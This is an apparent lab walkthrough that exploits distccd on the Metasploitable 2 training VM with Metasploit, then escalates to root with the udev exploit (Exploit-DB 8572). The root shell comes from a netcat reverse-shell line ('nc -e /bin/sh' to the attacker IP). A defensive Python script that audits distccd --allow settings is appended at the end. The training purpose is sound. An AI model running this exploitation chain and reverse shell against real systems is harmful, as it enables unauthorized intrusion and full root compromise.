The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
3632/tcp open distccd?
What is distccd?
Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile.
OK, time to search Metasploit:
msf > search distccd
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
Let’s run the exploit:
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(distcc_exec) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo i5VOR5zoE9EvGttx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "i5VOR5zoE9EvGttx\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:46436) at 2013-11-19 10:59:04 +0000

whoami
daemon
As we can see from the “whoami” output, we have a shell as the daemon user.
Now we will escalate our privileges from daemon to root using the udev (< 141) Local Privilege Escalation exploit, Exploit-DB entry 8572.
Firstly we get the exploit:
wget http://www.exploit-db.com/download/8572
--02:23:28--  http://www.exploit-db.com/download/8572
           => `8572'
Resolving www.exploit-db.com... 23.23.129.3, 23.23.150.193
Connecting to www.exploit-db.com|23.23.129.3|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/8572/ [following]
--02:23:29--  http://www.exploit-db.com/download/8572/
           => `index.html'
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 2,768 (2.7K) [application/txt]

    0K ..                                                    100%  414.77 KB/s

02:23:30 (414.77 KB/s) - `index.html' saved [2768/2768]

mv index.html exploit.c
gcc exploit.c -o exploit
The exploit instructions are:
Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].
The exploit will execute /tmp/run as root so throw whatever payload you want in there.
Put simply, we must find the PID of udevd and subtract 1:
pgrep udevd
3125
Now we need to open Netcat in a new Terminal in port listening mode:
:~# nc -vlp 12345
listening on [any] 12345 ...
Now to the exploit (note that the second line contains your attacking IP and the Netcat port, and the third line passes the PID minus one):
echo "#!/bin/sh" > /tmp/run
echo "nc -e /bin/sh 192.168.1.78 12345" >> /tmp/run
./exploit 3124
And our Netcat listener should come alive:
192.168.1.103: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.78] from (UNKNOWN) [192.168.1.103] 55574
whoami
root
And as you can see we are root!
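A defender's check for the distccd exposure that gave the first shell (an added example, not part of the original walkthrough): it parses output in the layout of `ps -eo pid,args` and flags any distccd started without an `--allow` restriction, which is the daemon's own mechanism for limiting which hosts may submit compile jobs. The process listing below is constructed; `--allow` and `--listen` are real distccd options, and the rest of the names are this example's own.

```python
import shlex

# Constructed sample in the layout of `ps -eo pid,args` (not taken from a real host).
SAMPLE_PS = """\
  PID COMMAND
  918 /usr/sbin/sshd -D
 2101 /usr/bin/distccd --daemon --user distccd --log-file=/var/log/distccd.log
 2102 /usr/bin/distccd --daemon --allow 10.0.0.0/24 --listen 10.0.0.5 --user distccd
 2103 /usr/bin/distccd --daemon --allow=0.0.0.0/0
"""

# Allow specs that match every IPv4 address: equivalent to no restriction at all.
OPEN_WORLD = {"0.0.0.0/0", "0/0"}


def option_values(argv, name):
    """Collect values passed as `--name VALUE` or `--name=VALUE`."""
    values = []
    for i, arg in enumerate(argv):
        if arg == name and i + 1 < len(argv):
            values.append(argv[i + 1])
        elif arg.startswith(name + "="):
            values.append(arg.split("=", 1)[1])
    return values


def audit_distccd(ps_output):
    """Map each distccd PID to a finding string.
    A daemon with no --allow (or an all-hosts --allow) accepts compile jobs,
    and therefore the commands they carry, from any client that can reach
    the port; that is the exposure the Nmap scan at the top of the page found."""
    findings = {}
    for line in ps_output.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 1)
        if len(parts) < 2:
            continue
        pid, cmdline = int(parts[0]), parts[1]
        argv = shlex.split(cmdline)
        if not argv or argv[0].rsplit("/", 1)[-1] != "distccd":
            continue
        allows = option_values(argv, "--allow")
        listens = option_values(argv, "--listen")
        if not allows:
            findings[pid] = "OPEN: no --allow, any reachable host may submit jobs"
        elif any(a in OPEN_WORLD for a in allows):
            findings[pid] = "OPEN: --allow covers every address (%s)" % ", ".join(allows)
        else:
            bind = listens[0] if listens else "all interfaces"
            findings[pid] = "restricted to %s, listening on %s" % (", ".join(allows), bind)
    return findings


if __name__ == "__main__":
    for pid, finding in sorted(audit_distccd(SAMPLE_PS).items()):
        print(pid, finding)
```

On a real host, feed it `ps -eo pid,args` output; PIDs reported as OPEN are the ones to restrict with `--allow` (and ideally `--listen`) or to firewall off from untrusted networks.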